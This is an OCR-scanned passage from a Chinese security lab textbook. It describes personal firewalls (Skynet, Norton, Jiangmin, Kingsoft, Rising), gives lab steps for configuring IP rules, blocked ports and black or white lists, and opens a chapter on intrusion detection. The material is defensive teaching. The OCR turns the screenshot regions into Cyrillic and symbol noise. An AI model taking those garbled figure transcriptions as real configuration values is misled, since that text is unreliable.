个 被 隔离 的 子 网 ,用 两 台 分 组 过 滤 路 由 器 将 这 一 子 网 分 别 与 内 部 网 络 和 外 部 网 络 分 开 。 

防火 墙 有 具有 以 下 作用 : 

CD 取消 或 拒绝 任何 未 被 明确 允许 的 软件 包 通 过 。 

(2) 将 外 部 用 户 保 持 在 内 部 网 之 外 ,对 外 部 用 户 访问 内 部 网 做 出 限制 。 

(3) 强制 执行 注册 .审计 和 报警 等 。 


6.1.2 个 人 防火 墙 


主流 的 个 人 防火 墙 包括 天 网 防火 墙 诺 顿 防火 墙 江 民 防 火 墙 、 金 山 网 镖 和 瑞星 个 人 
防火 墙 。 
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6.1.2.1 天 网 防火 墙 

天 网 防火 墙 是 由 天 网 安全 实验 室 研发 制作 的 、 应 用 于 个 人 计算 机 的 网 络 安全 工具 。 
它 根据 系统 管理 者 设 定 的 安全 规则 (security rules) Bj JP Bl £& ,提供 强大 的 访问 控制 .应 用 
选 通 、 信 息 过 滤 等 功能 ,能 够 抵挡 网 络 人 侵 和 攻击 ,防止 信息 泄露 ,保障 用 户 机 器 的 网 络 安 
全 。 天 网 防火 墙 把 网 络 分 为 本 地 网 和 互联 网 ,可 以 针对 来 自 不 同 网 络 的 信息 ,设置 不 同 的 
安全 方案 。 

天 网 防火 墙 具 有 以 下 特征 : 

(1) 严密 的 实时 监控 。 防 火 墙 会 监控 来 自 外 部 的 安全 威胁 ,过 滤 掉 所 有 未 授权 的 连 
接 , 时 刻 保护 系统 安全 。 

(2) 灵活 的 安全 规则 。 通 过 防火 墙 的 规则 设置 面板 ,可 以 方便 地 对 防火 墙 规则 进行 
增加 、 删 除 和 修改 ,可 以 根据 自身 需要 去 制定 相应 的 规则 ,官方 会 根据 网 络 安全 环境 不 定 
时 升级 最 新 规则 库 。 

(3) 便利 的 应 用 程序 规则 设置 。 拒 绝 任何 未 经 授权 的 内 部 程序 连接 网 络 , 从 而 阻 断 
所 有 病毒 木马 泄露 秘密 信息 。 

(4) 详细 的 访问 记录 和 完善 的 报警 系统 。 遇 到 安全 威胁 即 发 出 报警 ,并 记录 下 攻击 
来 源 及 其 攻击 类 型 等 信息 ,在 第 一 时 间 掌 握 系统 的 安全 情况 。 

(5) 独创 的 扩展 安全 级 别 。 无 需 对 防火 墙 进行 繁琐 设置 ,只 要 把 安全 级 别 调 成 “ 扩 
展 ” 级 别 即 可 ,每 当 有 最 新 规则 ,防火墙 会 自动 联网 升级 。 

(6) 完善 的 密码 保护 措施 。 查 看 ,修改 、 关 闭 防火 墙 均 需要 提供 密码 ,防止 病毒 或 黑 
客 恶 意 关闭 防火 墙 以 制造 安全 漏洞 。 

C) 稳定 的 进程 保护 。 进 程 保护 可 以 使 防火 墙 的 进程 享受 超越 系统 级 的 安全 待遇 ， 
保护 防火 墙 的 进程 不 被 恶意 关闭 。 

(8) 智能 的 入 侵 检测 。 针 对 密集 的 攻击 ,天 网 防火 墙 会 自动 判断 并 将 攻击 源 加 入 列 
表 ,默认 该 攻击 源 。 一 旦 攻击 源 被 加 入 默认 列表 ,所 有 来 自 这 里 的 攻击 一 律 屏蔽 。 


6.1.2.2 诺顿 防火 墙 

诺顿 防火 墙 是 由 赛 门 铁 克 公 司 提供 的 一 款 功 能 强大 的 防火 墙 。 诺 顿 防火 墙 所 集成 的 
功能 相当 丰富 ,除了 作为 基础 的 防火 墙 功 能 ,入 侵 检 测 、 隐 私 保护 等 功能 也 颇 为 强大 。 诺 
顿 在 浏览 器 中 集成 了 增加 Web 辅助 功能 的 插件 ,该 插件 可 以 动态 地 根据 所 浏览 网 站 的 情 
况 进 行 弹出 广告 窗口 .Applet、ActiveX 等 内 容 的 阻塞 ,而 用 户 可 以 针对 单个 网 站 决定 是 
否 阻 塞 这 些 内 容 , 同 时 以 关键 字 的 形式 维护 广告 信息 过 滤 清 单 。 另 外 ,该 插件 还 可 以 帮助 
用 户 禁 止 将 浏览 器 信息 、 访 问 历史 信息 等 泄露 给 外 部 网 络 。 诺 顿 防火 墙 所 集成 的 人 侵 检 
测 组 件 带 有 大 量 的 攻击 指纹 ,能 够 设 定 在 规定 时 间 内 阻止 发 起 的 攻击 ,其 功能 性 已 经 趋 近 
于 专业 的 人 侵 检测 系统 。 

诺顿 的 定制 能 力 不 单 体现 在 对 防火 墙 规则 的 设 定 上 ,辅助 功能 组 件 的 管理 功能 也 相 
当 强 大 。 以 人 侵 检测 指纹 为 例 ,用户 可 以 决定 哪些 攻击 需要 被 检测 ,而 哪些 需要 被 忽略 ; 
同时 ,可 以 选择 发 现 攻击 时 的 告警 方式 。 另 外 ,不 只 防火 墙 具 有 防护 等 级 ,包括 隐私 保护 
等 辅助 功能 也 可 以 独立 设置 级 别 , 用 户 可 以 快速 简便 地 设 定 计算 机 的 防护 强度 。 
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在 整体 设计 上 诺顿 相当 规整 ,大 量 的 功能 很 好 地 排 布 在 几 个 选项 中 ,相应 的 许多 操作 
需要 深入 多 个 界面 才能 完成 ,这 也 是 诺顿 操作 负担 较 高 的 主要 原因 。 诺 顿 为 用 户 提 供 了 
多 种 应 用 情境 模式 的 选择 ,对 这 些 模 式 分 别 赋予 了 不 同 的 规则 权限 。 初 级 用 户 可 以 安全 
高 效 地 利用 模式 的 切换 来 调整 对 计算 机 的 保护 ,而 相对 专业 的 基于 地 址 和 协议 的 过 滤 条 
件 设 定 被 隐藏 在 了 高 级 设置 部 分 ,专业 用 户 在 需要 的 情况 下 可 以 通过 该 界面 定义 更 加 复 
杂 的 防护 策略 。 

6.1.2.3 江 民 防火 墙 

江 民 防火 墙 是 一 款 专 为 解决 个 人 用 户 上 网 安全 而 设计 的 免费 网 络 安全 防护 工具 , 产 
品 融 入 了 先进 的 网 络 访问 动态 监控 技术 ,彻底 解决 黑客 攻击 .木马 程序 及 互联 网 病毒 等 各 
种 网 络 危险 的 入 侵 , 全 面 保护 个 人 上 网 安全 。 

江 民 防火 墙 具 有 以 下 特征 : 

d) 全 新 网 络 访问 动态 监控 技术 。 动 态 监控 黑客 攻击 、 木 马 程序 、 互 联网 病毒 等 危 
险 , 保 护 上 网 账号 .QQ 密码 、 游 戏 分 值 . 银 行 账号 、 邮 件 密码 .个 人 隐私 等 重要 信息 不 
УРЕ. 

(2) 网 络 安全 级 别 设 定 ,智能 防 黑客 PEA Вя R HE 
满足 不 同 需求 用 户 网 络 安全 选择 ;监视 网 络 数据 流 , 遇 危险 ,报警 提示 。 

(3) 程序 访问 控制 技术 ,网 络 日 志 记 录 技 术 。 用 户 可 对 本 地 网 络 规则 进行 匹配 设置 ， 
保证 只 有 安全 可 靠 的 访问 才 被 允许 :详细 记录 网 络 链接 情况 , 留 下 非法 访问 和 未 被 授权 访 
问 对 象 详细 的 TP 地 址 。 

(4) 网 络 访问 控制 ,过 滤 不 良 网 站 ,保证 数据 安全 。 通 过 设置 防火 墙 管理 中 的 区 域 访 
问 控制 规则 ,可 以 阻止 不 良 网 站 和 受 控 制 网 段 访 问 计 算 机 ,清洁 网 络 空间 ,保证 数据 安全 。 


6.1.2.4 金山 网 镖 

金山 网 镖 是 一 款 由 金山 毒霸 推出 ,为 个 人 计算 机 量 身 定做 的 网 络 安全 产品 。 它 根据 
个 人 上 网 的 不 同 需 要 , 设 定安 全 级 别 , 有 效 地 提供 网 络 流量 监控 ,应 用 程序 访问 网 络 权 限 
控制 ,病毒 预警 ,黑客 .木马 攻击 监测 。 

金山 网 镖 具有 以 下 特征 : 

(1) 全 面 安全 防护 。 金 山 网 镖 是 专业 的 个 人 网 络 防火 墙 , 提 供 对 黑客 程序 .木马 和 间 
谍 软 件 以 及 其 他 恶意 程序 的 拦截 查 杀 ,对 网 络 进行 全 方位 攻击 防护 ,并 且 , 还 提供 了 网 络 
访问 监控 .共享 目录 管理 .不良 网 站 过 滤 等 多 种 网 络 安全 实用 功能 。 

(2) 防 网 络 钓鱼 。 防 止 钓鱼 网 站 .钓鱼 邮件 的 攻击 ,用户 访 问 钓鱼 网 站 时 网 镖 会 自动 
拦截 ,防止 用 户 的 账号 、 密 码 等 重要 信息 被 盗 。 

G) 历史 痕迹 清理 。 帮 助 用 户 预 览 并 清理 软件 使 用 的 痕迹 ,避免 重要 文件 .信息 或 个 
人 隐私 被 泄露 。 

(4) 木马 防火 墙 。 通 过 多 种 技术 ,实现 对 木马 进程 的 查 杀 。 系 统 中 一 旦 有 木马 .黑客 
或 间谍 程序 访问 网 络 ,会 及 时 拦截 该 程序 对 外 的 通信 访问 ,然后 对 内 存 中 的 进程 进行 自动 
查 杀 ,保护 用 户 网 络 通信 的 安全 。 这 对 防御 盗 取 用 户 信息 的 木马 .黑客 程序 特别 有 效 。 具 
体 体 现在 以 下 三 个 方面 : 能 够 设置 应 用 程序 的 访问 权限 ; @ 通 过 高 .中 、 低 三 种 安全 级 
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别 的 设 定 ,达到 不 同 程度 地 保护 用 户 安全 的 目的 ; @ 能 够 阻止 如 冰河 .B10、 网 络 神偷 等 常 
见 木 马 对 用 户 的 危害 ; 若 有 木马 侵入 ,金山 网 镖 会 及 时 拦截 ,并 弹出 对 话 框 告知 用 户 已 成 
功 拦截 ,真正 做 到 实时 保护 计算 机 的 目的 。 

(5) 智能 防 黑 技术 。 融 杀毒 技术 与 网 络 防 火 墙 技术 于 一 体 , 直 接 查 杀 流行 木马 与 黑 
客 程序 。 动 态 监 视 计算 机 的 Internet 活动 状态 ,随时 加 以 控制 。 高 级 用 户 可 以 完全 细致 
地 定制 不 同 的 IP 包 过 滤 规 则 。 

(6) 程序 应 用 规则 中 可 以 根据 自己 的 需要 设置 各 程序 访问 互联 网 和 局 域 网 的 权限 ， 
一 般 来 说 ,很 多 程序 是 可 以 设置 成 禁止 访问 网 络 来 减 小 受 攻击 的 可 能 程度 。 


6.1.2.5 瑞星 防火 墙 

瑞星 个 人 防火 墙 最 新 版 采用 增强 型 指纹 技术 ,有 效 地 监控 网 络 连接 ;内 置 细 化 的 规则 
设置 ,使 网 络 保护 更 加 智能 ;游戏 防盗 、 应 用 程序 保护 等 高 级 功能 ,为 个 人 计算 机 提供 全 面 
安全 保护 ;通过 过 滤 不 安全 的 网 络 访问 服务 , 极 大 地 提高 了 用 户 计算 机 的 上 网 安全 ;彻底 
阻挡 黑客 攻击 、 木 马 程 序 等 网 络 危 险 , 保 护 上 网 账号 .QQ 密码 、 网 游 账号 等 信息 不 被 
窃取 。 

瑞星 防火 墙 具 有 以 下 特征 : 

CD 防火 墙 多 账户 管理 。 防 火 墙 提供 “管理 员 ” 和 “普通 用 户 ” 两 种 账户 。 防 火 墙 提供 
切换 账户 功能 可 以 在 两 种 账户 之 间 进 行 切换 。 管 理 员 可 以 执行 防火 墙 的 所 有 功能 ;普通 
用 户 不 能 修改 任何 设置 .规则 ,不 能 启动 /停止 .退出 防火 墙 。 

(2) 未 知 木马 扫描 技术 。 通 过 启发 式 查 毒 技 术 , 当 有 程序 进行 网 络 活动 的 时 候 , 对 该 
进程 调用 未 知 木 马 扫描 程序 进行 扫描 ,如 果 该 进程 为 可 疑 的 木马 病毒 , 则 提示 用 户 。 此 技 
术 提 高 了 对 可 疑 程序 自动 识别 的 能 力 。 

(3) IE 功能 调用 拦截 。 由 于 TE 提供 了 公开 的 Com 组 件 调用 接口 ,有 可 能 被 恶意 程 
序 所 调用 。 此 功能 是 对 需要 调用 ТЕ 接口 的 程序 进行 检查 。 如 果 检 查 为 恶意 程序 ,向 用 户 
报警 。 

(4) 反 钓 鱼 、 防 木马 病毒 网 站 。 反 钓鱼 、 防 木马 病毒 网 站 提供 强大 的 、 可 以 升级 的 
黑 名 单 规则 库 , 库 中 是 非法 的 、 高 风险 、 高 危害 的 网 站 地 址 列表 ,符合 该 库 的 访问 会 被 
禁止 。 

(5) 模块 检查 。 防 火 墙 能 够 控制 是 否 允 许 某 个 模块 访问 网 络 。 当 应 用 程序 访问 网 络 
的 时 候 , 对 参与 访问 的 模块 进行 检查 ,根据 模块 的 访问 规则 决定 是 否 允 许 该 访问 。 以 往 的 
防火 墙 只 是 对 应 用 程序 进行 检查 ,而 没有 对 所 关联 的 dll 做 检查 。 进 行 模块 检查 防止 了 
木马 模块 注入 到 正常 进程 中 访问 网 络 。 


6.2 天 网 防火 墙 实验 


实验 器 材 
。 天 网 防火 墙 个 人 版 软件 系统 1 套 。 
。 PC(Windows XP/Windows 7)1 台 。 
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项 习 要 求 

+ 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
。 复习 天 网 防火 墙 的 使 用 方法 。 

。 做 好 预习 报告 。 

实验 任务 


通过 本 实验 ,掌握 天 网 防火 墙 的 安装 及 基本 配置 ;学 会 利用 天 网 防火 墙 保护 系统 


安全 
实验 环境 
装 有 Windows XP/Windows 7 操作 系统 的 PC。 
预备 知识 
。 防火 墙 技术 及 原理 。 
。 网 络 协议 。 
деле 
. 基本 设置 
ae 1 тох, 2 B Л 5], ЖАЛУУ E ‚ЛУ И] ЖЕ ЛУ ЖО Jy JR. Ped ҢЫ ЛЕТ aE, E f BZ 
置 几 个 方面 。 
基本 设置 | 管理 权限 讽 置 | germer] накы] Co 
rea 一 一 一 一 一 一 一 一 一 p 规则 设 定 
V 开机 后 自动 启动 防火 墙 | (9) [5] 
p 应 用 程序 权限 
T- 允许 所 有 的 应 用 程序 访问 网 络 , 并 在 规则 中 记录 这 些 程序 
局 域 网 地 址 设 定 
局 域 网 地 址 [10 -246.21 29 —— 
г 其 他 设置 
р 报警 声音 E Poran Fiesse нем 
图 61 天 网 防火 墙 设置 界面 
启动 ?项 是 设 定 开机 后 自动 启动 防火 墙 ,在 默认 情况 下 不 启动 .一般 选择 自动 启动 。 
这 也 是 安装 防火 墙 的 目的 。 


“规则 设 定 ? 是 个 设置 向 导 , 可 以 分 别 设置 安全 级 别 Jer RU fri 


息 设置 .常用 应 用 程序 设置 。 用 户 可 以 根据 网 络 环境 和 爱好 对 “局 域 网 地 址 设 定 ” 和 “其 他 
+ LIG 


设置 进行 自由 设置 。 

2. 安全 级 别 设置 

最 新 版 的 天 网 防火 墙 的 安全 级 别 分 为 高 .中 、 低 、. 自 定义 四 类 。 把 鼠标 置 于 某 个 级 别 
上 时 ,可 从 注释 对 话 框 中 查看 详细 说 明 , 如 图 6. 2 所 示 。 


图 62 安全 级 别 设置 界面 


* 低 安全 级 别 情况 下 ,完全 信任 局 域 网 ,允许 局 域 网 中 的 机 器 访问 自己 提供 的 各 种 
服务 ,但 禁止 互联 网 上 的 机 器 访问 这 些 服务 。 

。 中 安全 级 别 下 ,局域网 中 的 机 器 只 可 以 访问 共享 服务 ,但 不 允许 访问 其 他 服务 ,也 
不 允许 互联 网 中 的 机 器 访问 这 些 服务 ,同时 运行 动态 规则 管理 。 

。 高 安全 级 别 下 ,系统 屏蔽 掉 所 有 向 外 的 端口 ,局 域 网 和 互联 网 中 的 机 器 都 不 能 访 
问 自 己 提供 的 网 络 共享 服务 ,网络 中 的 任何 机 器 都 不 能 查找 到 该 机 器 的 存在 。 

。 自 定 义 级 别 适 合 了 解 TCP/IP 协议 的 用 户 ,可 以 设置 TP 规则 ,而 如 果 规 则 设置 不 
正确 ,可 能 会 导致 不 能 访问 网 络 。 

对 普通 个 人 用 户 ,一 般 推荐 将 安全 级 别 设置 为 中 级 。 

3. 应 用 程序 访问 网 络 权 限 设 置 

在 设置 的 高 级 选项 中 ,可 以 设置 该 应 用 程序 是 通过 ТСР 还 是 UDP 协议 访问 网 络 ,及 

TCP 协议 可 以 访问 的 端口 , 当 不 符合 条 件 时 ,程序 将 询问 用 户 或 禁止 操作 ,如 图 6. 3 


所 示 。 
4. BEX IP 规则 设置 
在 选中 中 级 安全 级 别 时 ,进行 自 定义 IP 规则 的 设置 是 很 必要 的 。 在 这 一 项 设置 中 ， 
可 以 自行 添加 、 编 辑 、 删 除 TP. 规则 ,对 防御 入 侵 可 以 起 到 很 好 的 效果 ,如 图 6.4 所 示 。 
应 用 程序 访问 网 络 权限 设置 ЫШ = 3 (24) -一 E 
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& BA + CAwindows\spstem2\services exe. Ы — © H iom 攻击 a 任何 
删除 Ө |Р 数据 也 监视 ТСР | 曲 | 任何 
Spooler SubSystem А 15126002 V (x) OQ РИИ НТ ЕЕ ТСР | BMA 
[ee е ае Fines reped O 允许 局 城 网 的 机 可 使 用 我 的 共享 次 汇 TCP à BMA 
* (mm © 。 禁止 互联 网 上 的 机 器 使 用 我 的 共享 党 TCP i 任何 v| 
|TDUpdate.exe Е] f WR) al „ 1I 
j т UE) PIC 命令 去 探测 其 他 机 器 时 ， 如 果 那 台 机 器 安装 了 TCP/IP 协 议 ， 就 : 
3 me e х (mm Г за ш RN 
Thunder exe 版 本 : 5.0.3.86 @ [= | 
ра | 路径 :C:\Program Files\Thunder o 
Network\Thunder\T hunder.exe x His E 
图 63 应 用 程序 访问 网 络 权 限 设 置 图 64 IP 访 问 规则 设置 
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对 于 对 IP 规则 不 甚 精通, 并且 也 不 想 去 了 解 这 方面 内 容 的 用 户 , 通 过 下 载 天 网 或 其 
他 网 友 提 供 的 安全 规则 库 ,将 其 导入 到 程序 中 ,也 可 以 起 到 一 定 的 防御 木马 程序 .抵御 人 
侵 的 效果 ,缺点 是 对 于 最 新 的 木马 和 攻击 方法 ,需要 重新 进行 规则 库 的 下 载 。 

IP 规则 的 设置 分 为 规则 名 称 的 设 定 ,规则 的 说 明 , 数 据 包 方 向 ,对 方 IP 地 址 ,对 于 该 
规则 IP, TCP, UDP, ICMP, IGMP 协议 需要 做 出 的 设置 , 当 满 足 上 述 条 件 时 对 数据 包 的 
处 理 方式 ,对 数据 包 是 否 进行 记录 等 。 如 果 IP 规则 设置 不 当 , 天 网 防火 墙 的 警告 标志 就 
会 闪 个 不 停 ; 而 如 果 正 确 地 设置 了 IP 规则 , 则 既 可 以 起 到 保护 计算 机 安全 的 作用 ,又 可 以 
不 必 时 时 去 关注 警告 信息 。 

用 Ping 命令 探测 计算 机 是 否 在 线 是 黑客 经 常 使 用 的 方式 ,因此 要 防止 别人 用 Ping 
探测 。 

在 国内 IP 地 址 缺乏 的 情况 下 ,很 多 用 户 是 在 局 域 网 下 上 网 ,而 在 局 域 网 内 可 能 存在 
很 多 想 一 试 身手 的 黑客 。139 端口 是 经 常 被 黑客 利用 Windows 系统 的 IPC 漏洞 进行 攻 
击 的 端口 ,用 户 可 以 对 通过 这 个 端口 传输 的 数据 进行 监听 或 拦截 ,规则 是 名 称 可 定 为 
139 端口 监听 ,外 来 地 址 设 为 任何 地 址 ,在 TCP 协议 的 本 地 端口 可 填写 从 139 到 139, 通 
行 方式 可 以 是 通行 并 记录 ,也 可 以 是 拦截 ,这 样 就 可 以 对 这 个 端口 的 TCP 数据 进行 操作 。 
445 端口 的 数据 操作 类 似 。 

如 果 用 户 知道 某 个 木马 或 病毒 的 工作 端口 ,就 可 以 通过 设置 ТР 规则 封闭 这 个 端口 。 
方法 是 增加 ІР 规则 ,在 ТСР 或 UDP 协议 中 将 本 地 端口 设 为 从 该 端口 到 该 端口 ,对 符合 
该 规则 的 数据 进行 拦截 ,就 可 以 起 到 防范 该 木马 的 效果 。 

增加 木马 工作 端口 的 数据 拦截 规则 ,是 IP 规则 设置 中 最 重要 的 一 项 技术 。 

实验 报告 要 求 

。 实验 目的 。 

* 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 


6.3 瑞星 防火 墙 实验 


实验 器 材 

。 瑞星 防火 墙 个 人 版 软件 系统 1 Ж. 

* PC(Windows XP/Windows 7)1 台 。 

预习 要 求 

。 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
。 复习 瑞星 防火 墙 的 使 用 方法 。 

。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 


通过 本 实验 ,掌握 瑞星 防火 墙 的 安装 及 基本 配置 ;学 会 利用 瑞星 防火 墙 保护 系统 安全 。 
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实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC. 

预备 知识 

。 防火 墙 技术 及 原理 。 

* 网 络 协议 。 

实验 步 又 

1. 启动 瑞星 个 人 防火 墙 软件 

采用 下 列 方法 之 一 可 以 启动 瑞星 个 人 防火 墙 软件 ,启动 后 的 界面 如 图 6.5 所 示 : 

CD 用 鼠标 双击 桌面 上 的 “瑞星 个 人 防火 墙 ?快捷 图 标 。 

(2) 单 击 “开始 ?按钮 ,选择 “程序 "|* 瑞 星 个 人 防火 墙 ?| “瑞星 个 人 防火 墙 >。 提 示 
一 般 情 况 下 ,瑞星 个 人 防火 墙 在 系统 启动 时 将 自动 启动 。 


瑞星 个 人 防火 墙 
操作 @) вят # how 


系统 状态 
系统 工作 于 常规 模式 ， 访 问 规则 中 没有 规定 动作 的 程序 在 访问 网 络 时 ， 会 提示 用 户 。 


受 攻 击 信息 
系统 启动 以 来 ， 还 没有 发 现 对 系统 的 攻击 。 


pem ) 国 更 区 信息 ] 


ЕЕЕ: Жан |н [ш ш [ш ш [ш [7 ш. U 
系统 漏洞 信息 修 的 系统 目前 存在 6 个 不 安全 设置 
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图 65 瑞星 个 人 防火 墙 窗口 


2. 设置 安全 级 别 

在 防火 墙 程序 窗口 的 右 下 角 , 拖 动 滑 块 到 最 右 侧 , 即 可 设 定安 全 级 别 为 “高 级 ”。 提 
лї: 关于 安全 级 别 的 定义 及 规则 如 下 。 

。 普通 : 系统 在 信任 的 网 络 中 ,除非 规则 禁止 的 ,否则 全 部 放 过 。 

。 中 级 : 系统 在 局 域 网 中 ,默认 允许 共享 ,但 是 禁止 一 些 较 危 险 的 端口 。 

。 高 级 : 系统 直接 连接 Internet, 除 非 规则 放行 ,否则 全 部 拦截 。 

3. 扫描 木马 病毒 

选择 防火 墙 程 序 窗口 上 的 “操作 ”菜单 ,选择 “扫描 木马 病毒 "命令 ,将 在 屏幕 右 下 角 弹 
出 扫描 窗口 ,扫描 结束 后 将 给 出 提示 , 单 击 提示 框 中 的 “详细 信息 ”按钮 可 以 查看 具体 的 扫 
描 结果 日 志 。 
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4. 黑白 名 单 的 设置 

1) 黑 名 单 的 设置 

黑 名 单 用 于 设置 禁止 与 本 机 通信 的 计算 机 列表 ,例如 ,可 以 把 攻击 本 机 的 计算 机 加 入 
此 名 单 。 选 择 “ 设 置 ”" 菜 单 下 的 “详细 设置 "命令 ， 
打开 “详细 设置 ”对 话 框 ; 单 击 “ 规 则 设置 "下 的 “ 黑 
名 单 ”; 单 击 “ 增 加 规则 ”按钮 ,弹出 一 个 如 图 6. 6 
所 示 的 “增加 黑 名 单 ” 对 话 框 ;在 “地 址 类 型 ”下拉 
列表 框 中 选择 “特定 地 址 ”或 “地 址 范围 ”; 在 “输入 
地 址 ”文本 框 中 输入 被 禁止 与 本 机 通信 的 IP 地 
址 ; 单 击 “ 保 存 ” 按 钮 , 即 可 完成 设置 。 

Deane 图 66 зажав" 

白 名 单 用 于 设置 完全 信任 的 计算 机 列表 , 列 
表 中 的 计算 机 对 本 机 有 完全 访问 权限 。 具 体操 作 参 看 黑 名 单 的 设置 。 

5. 修改 应 用 程序 访问 网 络 的 访问 规则 

CD 选择 “设置 ”菜单 下 的 “详细 设置 ”命令 ,打开 “详细 设置 ”对 话 框 。 

(2) 选择 “规则 设置 "下 的 “访问 规则 ”命令 ,打开 如 图 6.7 所 示 的 对 话 框 。 


Гои 


BE |9 ареяяг | аня | 6 лят |9 зня | 


era  LARZAM No 


67 访问 规则 设置 


(3) 允许 或 禁止 应 用 程序 访问 网 络 。 在 程序 列表 框 中 选择 一 个 应 用 程序 ,如 
“Telnet”; 单 击 “ 编 辑 规则 ”按钮 ,弹出 如 图 6. 8 所 示 的 “编辑 访问 规则 ”对 话 框 ;在 “常规 ” 
模式 下 选择 “禁止 ”; 单 击 “ 保 存 ” 按 钮 , 即 可 禁止 Telnet 程序 访问 网 络 。 

实验 报告 要 求 

”实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
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编辑 访问 规则 


aes 
Telnet 
1 el \windows\system32\tlntsvr. exe 


1 Microsoft Corporation 

1 5.1.2800.2180 (xpsp sp2 rtm.040803-2158) 
ES Ir] 
: — 
Варан? 


LELZEM САБ НЕ LLLAM LL Pe 


图 68 ”编辑 访问 规则 "对话 框 


。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


6.4 ”防火墙 评测 实验 


实验 器 材 

。 天 网 防火 墙 软件 系统 1 套 。 

。 瑞星 防火 墙 软件 系统 1 套 。 

。 江 民 防 火 墙 软件 系统 1 套 。 

* PC(Windows XP/Windows 7)1 4. 

预习 要 求 

。 做 好 实验 预习 ,复习 防火 墙 技术 的 有 关内 容 。 
。 复习 天 网 防火 墙 等 多 种 防火 墙 的 使 用 方法 。 
。 熟悉 实验 过 程 和 基本 操作 流程 。 

。 做 好 预习 报告 。 

实验 任务 

通过 本 实验 ,掌握 主流 防火 墙 的 性 能 和 功能 。 
实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 РС. 
预备 知识 

防火 墙 技术 及 原理 。 

ТҮҮ 

(1) 完整 记录 天 网 防火 墙 、. 瑞 星 防火 墙 控制 的 实验 内 容 。 
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(2) 从 6. 1. 2 小 节 中 选择 江 民 防火 墙 或 自行 确定 另外 一 种 类 型 的 软件 防火 墙 ,进行 
(3) 确定 防火 墙 的 性 能 、 功 能、 特定 功能 三 个 方面 作为 评测 分 析 报 告 的 主体 。 

Са) 撰写 并 完成 评测 分 析 报 告 。 

实验 报告 要 求 

。 实验 目的 。 

+ 附 上 实验 过 程 的 截图 和 结果 截图 。 

。 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 
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第 7 章 入 侵 检 测 实 验 


随 着 计算 机 技术 的 发 展 ,网 络 日 趋 复 杂 , 传 统 防火 墙 的 弱点 和 不 足 逐 渐 暴 露出 来 , 因 
此 引发 人 们 对 入 侵 检测 系统 技术 的 研究 和 开发 。 网 络 入 侵 检 测 系统 可 以 弥补 防火 墙 的 不 
足 , 为 网 络 安全 提供 实时 的 入 侵 检 测 , 并 采取 相应 的 防护 手段 。 入 侵 检 测 技 术 是 近 20 年 
来 出 现 的 一 种 主动 保护 自己 免 受 黑客 攻击 的 新 型 网 络 安全 技术 。 从 系统 运行 过 程 中 产生 
的 或 系统 所 处 理 的 各 种 数据 中 查找 出 威胁 系统 安全 的 因素 ,并 对 威胁 做 出 相应 的 处 理 ,就 
称 为 人 侵 检 测 。 响 应 的 软件 或 硬件 称 为 人 侵 检 测 系统 。 入 侵 检测 系统 被 称 为 是 防火 墙 之 
后 的 第 二 道 防 门 , 它 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进行 检测 ,提供 对 内 部 攻击 、 外 部 
攻击 的 实时 保护 。 


7.1 入 侵 检测 原理 


7.1.1 入 侵 检 测 步骤 


入 侵 检 测 一 般 分 为 两 个 步骤 : 信息 收集 和 数据 分 析 。 

入 侵 检 测 利 用 的 信息 一 般 来 自 以 下 四 个 方面 : 系统 日 志 、 目 录 以 及 文件 中 的 异常 改 
AE ,程序 执行 中 的 异常 行为 和 物理 形式 的 入 侵 信息 。 

COD 系统 日 志 : 利用 系统 日 志 是 检测 入 侵 的 必要 条 件 。 日 志文 件 中 记录 了 各 种 行为 
类 型 ,每 种 类 型 又 包含 不 同 的 信息 ,对 用 户 活动 来 讲 , 不 正常 的 或 不 期 望 的 行为 就 是 重复 
登录 失败 以 及 非 授权 访问 重要 文件 等 。 

(2) 目录 以 及 文件 异常 : 网 络 环境 中 的 文件 系统 包含 很 多 软件 和 数据 文件 ,包含 重 
要 信息 的 文件 和 私有 数据 文件 经 常 是 被 修改 或 破坏 的 目标 。 

(3) 程序 执行 异常 : 网 络 系统 上 的 程序 执行 一 般 包括 操作 系统 、 网 络 服务 ,用户 启动 
的 程序 和 应 用 。 每 个 在 系统 上 执行 的 程序 由 一 到 多 个 进程 来 实现 。 每 个 进程 在 具有 不 同 
权限 的 环境 中 执行 ,这 种 环境 控制 着 进程 可 访问 的 系统 资源 ,程序 和 数据 文件 等 。 

(4) 物理 形式 的 入 侵 信息 : 一 是 未 授权 的 网 络 硬件 连接 ;二 是 物理 资源 的 未 授权 
访问 。 


7.1.2 检测 技术 特点 


在 使 用 入 侵 检 测 技术 时 ,应 该 注意 具有 以 下 技术 特点 的 应 用 要 根据 具体 情况 进行 
选择 。 
1) 信息 收集 分 析 时 间 
信息 收集 分 析 时 间 可 分 为 固定 时 间 间 隔 和 实时 收集 分 析 两 种 。 
采用 固定 时 间 间 隔 方法 ,在 固定 间隔 的 时 间 段 内 收集 和 分 析 这 些 信 息 。 这 种 技术 适 
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用 于 对 安全 性 能 要 求 较 低 的 系统 ,对 系统 的 开销 影响 较 小 ;但 这 种 技术 的 缺点 是 在 时 间 间 
隔 内 将 失去 对 网 络 的 保护 。 

采用 实时 收集 和 分 析 技 术 可 以 实时 地 抑制 攻击 ,使 系统 管理 员 及 时 了 解 并 阻止 攻击 
系统 管理 员 也 可 以 记录 黑客 的 信息 ;缺点 是 加 大 了 系统 开销 。 

2) 采用 的 分 析 类 型 

采用 的 分 析 类 型 分 为 签名 分 析 ,统计 分 析 和 完整 性 分 析 。 

签名 分 析 就 是 同 攻击 数据 库 中 的 系统 设置 和 用 户 行为 模式 匹配 。 在 许多 人 和 人 侵 检测 系 
统 中 ,都 建 有 这 种 已 知 攻击 的 数据 库 。 这 种 数据 库 可 以 经 常 更 新 ,以 对 付 新 的 威胁 。 签 名 
分 析 的 优点 在 于 能 够 有 针对 性 地 收集 系统 数据 ,减少 了 系统 的 开销 ,如 果 数 据 库 不 是 特别 
大 ,那么 签名 分 析 比 统计 分 析 更 为 有 效 。 

